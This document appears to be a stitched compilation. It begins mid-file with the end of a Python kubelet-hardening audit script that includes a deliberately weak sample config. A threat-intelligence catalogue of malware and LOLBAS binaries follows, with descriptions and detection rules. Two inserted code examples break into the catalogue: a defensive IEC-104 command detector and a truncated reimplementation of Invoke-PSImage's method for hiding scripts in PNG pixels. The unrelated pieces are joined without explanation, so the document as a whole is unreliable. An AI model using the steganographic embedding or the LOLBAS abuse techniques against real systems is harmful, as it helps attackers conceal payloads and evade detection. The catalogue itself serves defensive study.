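# Constructed sample: a kubelet that answers unauthenticated API calls and
# authorises everything. This is what "misconfigured kubelet" means in practice.
WEAK_KUBELET = json.dumps({
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": True},
                       "webhook": {"enabled": False}},
    "authorization": {"mode": "AlwaysAllow"},
    "readOnlyPort": 10255,
})

# Constructed sample: the hardened equivalent.
HARDENED_KUBELET = json.dumps({
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": False},
                       "webhook": {"enabled": True}},
    "authorization": {"mode": "Webhook"},
    "readOnlyPort": 0,
})


def audit_kubelet(config_json: str) -> list:
    """Return findings as strings; an empty list means nothing weak was found."""
    cfg = json.loads(config_json)
    findings = []
    auth = cfg.get("authentication", {})
    anon = auth.get("anonymous", {}).get("enabled")
    if anon is None:
        findings.append("authentication.anonymous.enabled is not set; set it to "
                        "false explicitly instead of relying on a default")
    elif anon:
        findings.append("anonymous authentication enabled: any client that can "
                        "reach port 10250 can list pods and exec into them")
    if not auth.get("webhook", {}).get("enabled", False):
        findings.append("webhook authentication disabled: bearer tokens are not "
                        "validated against the API server")
    mode = cfg.get("authorization", {}).get("mode")
    if mode != "Webhook":
        findings.append("authorization.mode is %r, not Webhook: every request that "
                        "passes authentication (including anonymous) is allowed" % mode)
    if cfg.get("readOnlyPort", 0):
        findings.append("readOnlyPort %d open: unauthenticated pod and node "
                        "discovery" % cfg["readOnlyPort"])
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_KUBELET), ("hardened", HARDENED_KUBELET)):
        print(label, audit_kubelet(cfg) or ["ok"])
```

The check deliberately reports a missing `anonymous.enabled` rather than assuming a default, because the kubelet's command-line flags and its config file do not share defaults; a fleet audit should require the value to be explicit.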

Hi-Zor

[Hi-Zor](https://app.tidalcyber.com/software/286184d9-f28a-4d5a-a9dd-2216b3c47809) is a remote access tool (RAT) that has characteristics similar to [Sakula](https://app.tidalcyber.com/software/a316c704-144a-4d14-8e4e-685bb6ae391c). It was used in a campaign named INOCNATION. <sup>[[Fidelis Hi-Zor](https://app.tidalcyber.com/references/0c9ff201-283a-4527-8cb8-6f0d05a4f724)]</sup>

The tag is: misp-galaxy:software="Hi-Zor"

HOMEFRY

[HOMEFRY](https://app.tidalcyber.com/software/16db13f2-f350-4323-96cb-c5f4ac36c3e0) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://app.tidalcyber.com/groups/eadd78e3-3b5d-430a-b994-4360b172c871) backdoors. <sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup>

The tag is: misp-galaxy:software="HOMEFRY"

HOPLIGHT

[HOPLIGHT](https://app.tidalcyber.com/software/4d94594c-2224-46ca-8bc3-28b12ed139f9) is a backdoor Trojan that has reportedly been used by the North Korean government.<sup>[[US-CERT HOPLIGHT Apr 2019](https://app.tidalcyber.com/references/e722b71b-9042-4143-a156-489783d86e0a)]</sup>

The tag is: misp-galaxy:software="HOPLIGHT"

HotCroissant

[HotCroissant](https://app.tidalcyber.com/software/a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.<sup>[[US-CERT HOTCROISSANT February 2020](https://app.tidalcyber.com/references/db5c816a-2a23-4966-8f0b-4ec86cae45c9)]</sup> [HotCroissant](https://app.tidalcyber.com/software/a00e7fcc-b4e8-4f64-83d2-f9db64f0f3fe) shares numerous code similarities with Rifdoor.<sup>[[Carbon Black HotCroissant April 2020](https://app.tidalcyber.com/references/43bcb35b-56e1-47a8-9c74-f7543a25b2a6)]</sup>

The tag is: misp-galaxy:software="HotCroissant"

HUC Packet Transmit Tool - Associated Software

The tag is: misp-galaxy:software="HUC Packet Transmit Tool - Associated Software"

HTRAN

[HTRAN](https://app.tidalcyber.com/software/b98d9fe7-9aa3-409a-bf5c-eadb01bac948) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. <sup>[[Operation Quantum Entanglement](https://app.tidalcyber.com/references/c94f9652-32c3-4975-a9c0-48f93bdfe790)]</sup><sup>[[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)]</sup>

The tag is: misp-galaxy:software="HTRAN"

Token Control - Associated Software

The tag is: misp-galaxy:software="Token Control - Associated Software"

HttpDump - Associated Software

The tag is: misp-galaxy:software="HttpDump - Associated Software"

HTTPBrowser

[HTTPBrowser](https://app.tidalcyber.com/software/c4fe23f7-f18c-40f6-b431-0b104b497eaa) is malware that has been used by several threat groups. <sup>[[ThreatStream Evasion Analysis](https://app.tidalcyber.com/references/de6bc044-6275-4cab-80a1-feefebd3c1f0)]</sup> <sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup> It is believed to be of Chinese origin. <sup>[[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)]</sup>

The tag is: misp-galaxy:software="HTTPBrowser"

httpclient

[httpclient](https://app.tidalcyber.com/software/bf19eba4-7ea1-4c24-95c6-6bcfb44f4c49) is malware used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. <sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup>

The tag is: misp-galaxy:software="httpclient"

Roarur - Associated Software

The tag is: misp-galaxy:software="Roarur - Associated Software"

HomeUnix - Associated Software

The tag is: misp-galaxy:software="HomeUnix - Associated Software"

HydraQ - Associated Software

The tag is: misp-galaxy:software="HydraQ - Associated Software"

Aurora - Associated Software

The tag is: misp-galaxy:software="Aurora - Associated Software"

MdmBot - Associated Software

The tag is: misp-galaxy:software="MdmBot - Associated Software"

Homux - Associated Software

The tag is: misp-galaxy:software="Homux - Associated Software"

HidraQ - Associated Software

The tag is: misp-galaxy:software="HidraQ - Associated Software"

McRat - Associated Software

The tag is: misp-galaxy:software="McRat - Associated Software"

9002 RAT - Associated Software

The tag is: misp-galaxy:software="9002 RAT - Associated Software"

Hydraq

[Hydraq](https://app.tidalcyber.com/software/4ffbca79-358a-4ba5-bfbb-dc1694c45646) is a data-theft trojan first used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including APT17.<sup>[[MicroFocus 9002 Aug 2016](https://app.tidalcyber.com/references/a4d6bdd1-e70c-491b-a569-72708095c809)]</sup><sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup><sup>[[Symantec Trojan.Hydraq Jan 2010](https://app.tidalcyber.com/references/10bed842-400f-4276-972d-5fca794ea778)]</sup><sup>[[ASERT Seven Pointed Dagger Aug 2015](https://app.tidalcyber.com/references/a8f323c7-82bc-46e6-bd6c-0b631abc644a)]</sup><sup>[[FireEye DeputyDog 9002 November 2013](https://app.tidalcyber.com/references/68b5a913-b696-4ca5-89ed-63453023d2a2)]</sup><sup>[[ProofPoint GoT 9002 Aug 2017](https://app.tidalcyber.com/references/b796f889-400c-440b-86b2-1588fd15f3ae)]</sup><sup>[[FireEye Sunshop Campaign May 2013](https://app.tidalcyber.com/references/ec246c7a-3396-46f9-acc4-a100cb5e5fe6)]</sup><sup>[[PaloAlto 3102 Sept 2015](https://app.tidalcyber.com/references/db340043-43a7-4b16-a570-92a0d879b2bf)]</sup>

The tag is: misp-galaxy:software="Hydraq"

HyperBro

The tag is: misp-galaxy:software="HyperBro"

IceApple

[IceApple](https://app.tidalcyber.com/software/5a73defd-6a1a-4132-8427-cec649e8267a) is a modular Internet Information Services (IIS) post-exploitation framework that has been used since at least 2021 against the technology, academic, and government sectors.<sup>[[CrowdStrike IceApple May 2022](https://app.tidalcyber.com/references/325988b8-1c7d-4296-83d6-bfcbe533b75e)]</sup>

The tag is: misp-galaxy:software="IceApple"

IcedID

[IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433) has been downloaded by [Emotet](https://app.tidalcyber.com/software/c987d255-a351-4736-913f-91e2f28d0654) in multiple campaigns.<sup>[[IBM IcedID November 2017](https://app.tidalcyber.com/references/fdc56361-24f4-4fa5-949e-02e61c4d3be8)]</sup><sup>[[Juniper IcedID June 2020](https://app.tidalcyber.com/references/426886d0-cdf2-4af7-a0e4-366c1b0a1942)]</sup>

The tag is: misp-galaxy:software="IcedID"

Ie4uinit.exe - Associated Software

<sup>[[Ie4uinit.exe - LOLBAS Project](/references/01f9a368-5933-47a1-85a9-e5883a5ca266)]</sup>

The tag is: misp-galaxy:software="Ie4uinit.exe - Associated Software"

Ie4uinit

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Executes commands from a specially prepared ie4uinit.inf file.

Author: Oddvar Moe

Paths:
* c:\windows\system32\ie4uinit.exe
* c:\windows\sysWOW64\ie4uinit.exe
* c:\windows\system32\ieuinit.inf
* c:\windows\sysWOW64\ieuinit.inf

Detection:
* IOC: ie4uinit.exe copied outside of %windir%
* IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%
* Sigma: proc_creation_win_lolbin_ie4uinit.yml<sup>[[Ie4uinit.exe - LOLBAS Project](/references/01f9a368-5933-47a1-85a9-e5883a5ca266)]</sup>

The tag is: misp-galaxy:software="Ie4uinit"

Ieadvpack.dll - Associated Software

<sup>[[Ieadvpack.dll - LOLBAS Project](/references/79943a49-23d6-499b-a022-7c2f8bd68aee)]</sup>

The tag is: misp-galaxy:software="Ieadvpack.dll - Associated Software"

Ieadvpack

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.

Author: LOLBAS Team

Paths:
* c:\windows\system32\ieadvpack.dll
* c:\windows\syswow64\ieadvpack.dll

Detection:
* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)
* Splunk: detect_rundll32_application_control_bypass_advpack.yml<sup>[[Ieadvpack.dll - LOLBAS Project](/references/79943a49-23d6-499b-a022-7c2f8bd68aee)]</sup>

The tag is: misp-galaxy:software="Ieadvpack"

iediagcmd.exe - Associated Software

<sup>[[iediagcmd.exe - LOLBAS Project](/references/de238a18-2275-497e-adcf-453a016a24c4)]</sup>

The tag is: misp-galaxy:software="iediagcmd.exe - Associated Software"

iediagcmd

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Diagnostics Utility for Internet Explorer

Author: manasmbellani

Paths:
* C:\Program Files\Internet Explorer\iediagcmd.exe

Detection:
* Sigma: [win_proc_creation_lolbin_iediagcmd.yml](https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml)
* IOC: Sysmon Event ID 1
* IOC: Execution of process iediagcmd.exe with /out could be suspicious<sup>[[iediagcmd.exe - LOLBAS Project](/references/de238a18-2275-497e-adcf-453a016a24c4)]</sup>

The tag is: misp-galaxy:software="iediagcmd"

Ieexec.exe - Associated Software

<sup>[[Ieexec.exe - LOLBAS Project](/references/91f31525-585d-4b71-83d7-9b7c2feacd34)]</sup>

The tag is: misp-galaxy:software="Ieexec.exe - Associated Software"

Ieexec

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

Detection:
* Sigma: [proc_creation_win_lolbin_ieexec_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml)
* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)
* Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml)
* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)
* IOC: Network connections originating from ieexec.exe may be suspicious<sup>[[Ieexec.exe - LOLBAS Project](/references/91f31525-585d-4b71-83d7-9b7c2feacd34)]</sup>

The tag is: misp-galaxy:software="Ieexec"

Ieframe.dll - Associated Software

<sup>[[Ieframe.dll - LOLBAS Project](/references/aab9c80d-1f1e-47ba-954d-65e7400054df)]</sup>

The tag is: misp-galaxy:software="Ieframe.dll - Associated Software"

ifconfig

[ifconfig](https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. <sup>[[Wikipedia Ifconfig](https://app.tidalcyber.com/references/7bb238d4-4571-4cd0-aab2-76797570724a)]</sup>

The tag is: misp-galaxy:software="ifconfig"

OSX/MacDownloader - Associated Software

The tag is: misp-galaxy:software="OSX/MacDownloader - Associated Software"

iKitten

The tag is: misp-galaxy:software="iKitten"

Ilasm.exe - Associated Software

<sup>[[Ilasm.exe - LOLBAS Project](/references/347a1f01-02ce-488e-9100-862971c1833f)]</sup>

The tag is: misp-galaxy:software="Ilasm.exe - Associated Software"

Ilasm

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The .NET IL Assembler, used to compile (assemble) intermediate language source into a DLL or EXE.

Author: Hai vaknin (lux)

Paths:
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe

Detection:
* IOC: Ilasm may not be used often in production environments (such as on endpoints)
* Sigma: proc_creation_win_lolbin_ilasm.yml<sup>[[Ilasm.exe - LOLBAS Project](/references/347a1f01-02ce-488e-9100-862971c1833f)]</sup>

The tag is: misp-galaxy:software="Ilasm"

IMEWDBLD.exe - Associated Software

<sup>[[IMEWDBLD.exe - LOLBAS Project](/references/9d1d6bc1-61cf-4465-b3cb-b6af36769027)]</sup>

The tag is: misp-galaxy:software="IMEWDBLD.exe - Associated Software"

IMEWDBLD

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft IME Open Extended Dictionary Module

Author: Wade Hickey

Paths:
* C:\Windows\System32\IME\SHARED\IMEWDBLD.exe

Detection:
* Sigma: net_connection_win_imewdbld.yml<sup>[[IMEWDBLD.exe - LOLBAS Project](/references/9d1d6bc1-61cf-4465-b3cb-b6af36769027)]</sup>

The tag is: misp-galaxy:software="IMEWDBLD"

Imminent Monitor

[Imminent Monitor](https://app.tidalcyber.com/software/925fc0db-9315-4703-9353-1d0e9ecb1439) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.<sup>[[Imminent Unit42 Dec2019](https://app.tidalcyber.com/references/28f858c6-4c00-4c0c-bb27-9e000ba22690)]</sup>

The tag is: misp-galaxy:software="Imminent Monitor"

Impacket

[Impacket](https://app.tidalcyber.com/software/cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://app.tidalcyber.com/software/cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.<sup>[[Impacket Tools](https://app.tidalcyber.com/references/cdaf72ce-e8f7-42ae-b815-14a7fd47e292)]</sup>

The tag is: misp-galaxy:software="Impacket"

CRASHOVERRIDE - Associated Software

The tag is: misp-galaxy:software="CRASHOVERRIDE - Associated Software"

Win32/Industroyer - Associated Software

The tag is: misp-galaxy:software="Win32/Industroyer - Associated Software"

Industroyer

[Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.<sup>[[ESET Industroyer](https://app.tidalcyber.com/references/9197f712-3c53-4746-9722-30e248511611)]</sup> [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) was used in the attacks on the Ukrainian power grid in December 2016.<sup>[[Dragos Crashoverride 2017](https://app.tidalcyber.com/references/c8f624e3-2ba2-4564-bd1c-f06b9a6a8bce)]</sup> This is the first publicly known malware specifically designed to target and impact operations in the electric grid.<sup>[[Dragos Crashoverride 2018](https://app.tidalcyber.com/references/d14442d5-2557-4a92-9a29-b15a20752f56)]</sup>

The tag is: misp-galaxy:software="Industroyer"

Industroyer2

[Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) is a compiled, static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299). Security researchers assess that [Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) was designed to cause an impact on high-voltage electrical substations. The initial [Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, but it was discovered before deployment, resulting in no impact.<sup>[[Industroyer2 Blackhat ESET](https://app.tidalcyber.com/references/d9e8ca96-8646-5dd9-bede-56305385b2e4)]</sup>

The tag is: misp-galaxy:software="Industroyer2"
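Both entries above turn on IEC-104 traffic to substation equipment. The following parser is an added example, not ESET's or the malware's code: it decodes the IEC 60870-5-104 APDU framing and flags ASDUs that carry process commands in the control direction (type identifiers 45 to 51), the message class a tool built to impact a substation has to send. All frames are constructed by hand; a real monitor would feed it the TCP payload of port 2404 sessions and alert on commands from any source that is not the known SCADA master.

```python
"""Minimal IEC 60870-5-104 (IEC-104) APDU parser that flags control-direction
commands of the kind an Industroyer-style IEC-104 module issues (added example;
not ESET's or the malware's code). Frames below are constructed by hand."""
import struct
from dataclasses import dataclass
from typing import Optional

# ASDU type identifiers for process commands in the control direction.
CONTROL_TYPES = {
    45: "C_SC_NA_1 single command", 46: "C_DC_NA_1 double command",
    47: "C_RC_NA_1 regulating step", 48: "C_SE_NA_1 set-point (normalised)",
    49: "C_SE_NB_1 set-point (scaled)", 50: "C_SE_NC_1 set-point (float)",
    51: "C_BO_NA_1 bitstring of 32 bits",
}
COT_NAMES = {3: "spontaneous", 6: "activation", 7: "activation confirmation",
             20: "interrogated by station"}

# Constructed frames: start byte 0x68, APDU length, 4 control-field bytes, ASDU.
STARTDT_ACT = bytes.fromhex("68 04 07 00 00 00")                               # U-format
S_ACK = bytes.fromhex("68 04 01 00 04 00")                                     # S-format, N(R)=2
MONITOR_SP = bytes.fromhex("68 0e 00000000 01 01 0300 0100 050000 01")         # M_SP_NA_1, IOA 5 = ON
SINGLE_CMD = bytes.fromhex("68 0e 06000400 2d 01 0600 0100 100000 01")         # C_SC_NA_1, IOA 16, execute ON
DOUBLE_CMD = bytes.fromhex("68 0e 08000400 2e 01 0600 0100 110000 02")         # C_DC_NA_1, IOA 17, execute ON


@dataclass
class Apdu:
    fmt: str                          # "I" (numbered data), "S" (supervisory), "U" (unnumbered control)
    type_id: Optional[int] = None
    cot: Optional[int] = None         # cause of transmission, low 6 bits of the COT byte
    common_addr: Optional[int] = None
    ioa: Optional[int] = None         # information object address, 3 bytes little-endian
    qualifier: Optional[int] = None   # first byte after the IOA (SCO/DCO for types 45/46)


def parse_apdu(frame: bytes) -> Apdu:
    if len(frame) < 6 or frame[0] != 0x68:
        raise ValueError("not an IEC-104 APDU")
    if frame[1] != len(frame) - 2:
        raise ValueError("APDU length field does not match frame size")
    ctrl1 = frame[2]
    if ctrl1 & 0x03 == 0x03:
        return Apdu("U")
    if ctrl1 & 0x03 == 0x01:
        return Apdu("S")
    asdu = frame[6:]
    if len(asdu) < 6:
        raise ValueError("ASDU header truncated")
    type_id, cot = asdu[0], asdu[2] & 0x3F
    common_addr = struct.unpack_from("<H", asdu, 4)[0]
    body = asdu[6:]
    ioa = qualifier = None
    if len(body) >= 4:
        ioa = body[0] | (body[1] << 8) | (body[2] << 16)
        qualifier = body[3]
    return Apdu("I", type_id, cot, common_addr, ioa, qualifier)


def describe_command(a: Apdu) -> str:
    """Human-readable line for a control command; only 45/46 are fully decoded."""
    name = CONTROL_TYPES[a.type_id]
    select = "select" if a.qualifier & 0x80 else "execute"   # S/E bit
    if a.type_id == 45:
        state = "ON" if a.qualifier & 0x01 else "OFF"          # SCS
    elif a.type_id == 46:
        state = {1: "OFF", 2: "ON"}.get(a.qualifier & 0x03, "invalid")   # DCS
    else:
        state = "(value not decoded)"
    cause = COT_NAMES.get(a.cot, "COT %d" % a.cot)
    return f"{name}: CA {a.common_addr} IOA {a.ioa} {select} {state}, {cause}"


def flag_control_commands(frames) -> list:
    """Return a description of every frame that carries a process command."""
    hits = []
    for frame in frames:
        a = parse_apdu(frame)
        if a.fmt == "I" and a.type_id in CONTROL_TYPES and a.qualifier is not None:
            hits.append(describe_command(a))
    return hits


if __name__ == "__main__":
    for line in flag_control_commands([STARTDT_ACT, S_ACK, MONITOR_SP, SINGLE_CMD, DOUBLE_CMD]):
        print(line)
```

The monitoring-direction frame (type 1) and the U/S frames pass through silently; only the two command ASDUs are reported. Select-before-execute sequences show up as two hits for the same IOA with the S/E bit set and then cleared.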

Infdefaultinstall.exe - Associated Software

<sup>[[Infdefaultinstall.exe - LOLBAS Project](/references/5e83d17c-dbdd-4a6c-a395-4f921b68ebec)]</sup>

The tag is: misp-galaxy:software="Infdefaultinstall.exe - Associated Software"

Infdefaultinstall

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used to perform installation based on content inside inf files

Author: Oddvar Moe

Paths:
* C:\Windows\System32\Infdefaultinstall.exe
* C:\Windows\SysWOW64\Infdefaultinstall.exe

The tag is: misp-galaxy:software="Infdefaultinstall"

InnaputRAT

[InnaputRAT](https://app.tidalcyber.com/software/e42bf572-1e70-4467-a4b7-5e22c776c758) is a remote access tool that can exfiltrate files from a victim’s machine. [InnaputRAT](https://app.tidalcyber.com/software/e42bf572-1e70-4467-a4b7-5e22c776c758) has been seen out in the wild since 2016. <sup>[[ASERT InnaputRAT April 2018](https://app.tidalcyber.com/references/29c6575f-9e47-48cb-8162-15280002a6d5)]</sup>

The tag is: misp-galaxy:software="InnaputRAT"

Installutil.exe - Associated Software

<sup>[[LOLBAS Installutil](/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]</sup>

The tag is: misp-galaxy:software="Installutil.exe - Associated Software"

Installutil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

Detection:
* Sigma: [proc_creation_win_instalutil_no_log_execution.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml)
* Sigma: [proc_creation_win_lolbin_installutil_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml)
* Elastic: [defense_evasion_installutil_beacon.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml)
* Elastic: defense_evasion_network_connection_from_windows_binary.toml<sup>[[LOLBAS Installutil](/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]</sup>

The tag is: misp-galaxy:software="Installutil"

Interact.sh - Associated Software

The tag is: misp-galaxy:software="Interact.sh - Associated Software"

Interactsh

According to joint Cybersecurity Advisory AA23-250A (September 2023), Interactsh is "an open-source tool for detecting external interactions (communication)". The Advisory further states that the tool is "used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity".<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

The tag is: misp-galaxy:software="Interactsh"

InvisiMole

[InvisiMole](https://app.tidalcyber.com/software/3ee4c49d-2f2c-4677-b193-69f16f2851a4) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://app.tidalcyber.com/software/3ee4c49d-2f2c-4677-b193-69f16f2851a4) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) infrastructure has been used to download and execute [InvisiMole](https://app.tidalcyber.com/software/3ee4c49d-2f2c-4677-b193-69f16f2851a4) against a small number of victims.<sup>[[ESET InvisiMole June 2018](https://app.tidalcyber.com/references/629fa1d8-06cb-405c-a2f7-c511b54cd727)]</sup><sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup>

The tag is: misp-galaxy:software="InvisiMole"

Invoke-PSImage

[Invoke-PSImage](https://app.tidalcyber.com/software/2200a647-3312-44c0-9691-4a26153febbb) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one-liner for executing the script either from a file or from the web. An example of usage is embedding the PowerShell code from the Invoke-Mimikatz module into an image file. When the image is referenced from a macro, for example, the macro downloads the picture and executes the PowerShell code, which in this case dumps the passwords. <sup>[[GitHub Invoke-PSImage](https://app.tidalcyber.com/references/dd210b79-bd5f-4282-9542-4d1ae2f16438)]</sup>

The tag is: misp-galaxy:software="Invoke-PSImage"
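Invoke-PSImage hides one payload byte per pixel in the low 4 bits of two colour channels, so the image still renders normally. The block below is an added example written in Python rather than the tool's PowerShell, and it is not the Invoke-PSImage code: it performs the same nibble embedding into a hand-written PNG and then recovers the script from the decoded pixels, which is also the check an analyst runs on a suspect image. Which two channels carry the nibbles (here R and B) and the 4-byte length header are this example's choices, not the tool's; the cover image and the payload are constructed.

```python
"""Round-trip of the Invoke-PSImage embedding scheme: script bytes hidden in
the low 4 bits of two colour channels per pixel of a PNG (added example; not
the Invoke-PSImage code). Which two channels, and the 4-byte length header,
are this example's choices, not the tool's. Pure standard library."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, data: bytes) -> bytes:
    body = tag + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def write_png(rows) -> bytes:
    """rows: list of rows, each a list of (r, g, b) tuples. 8-bit RGB, filter type 0."""
    height, width = len(rows), len(rows[0])
    raw = b"".join(b"\x00" + bytes(c for px in row for c in px) for row in rows)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
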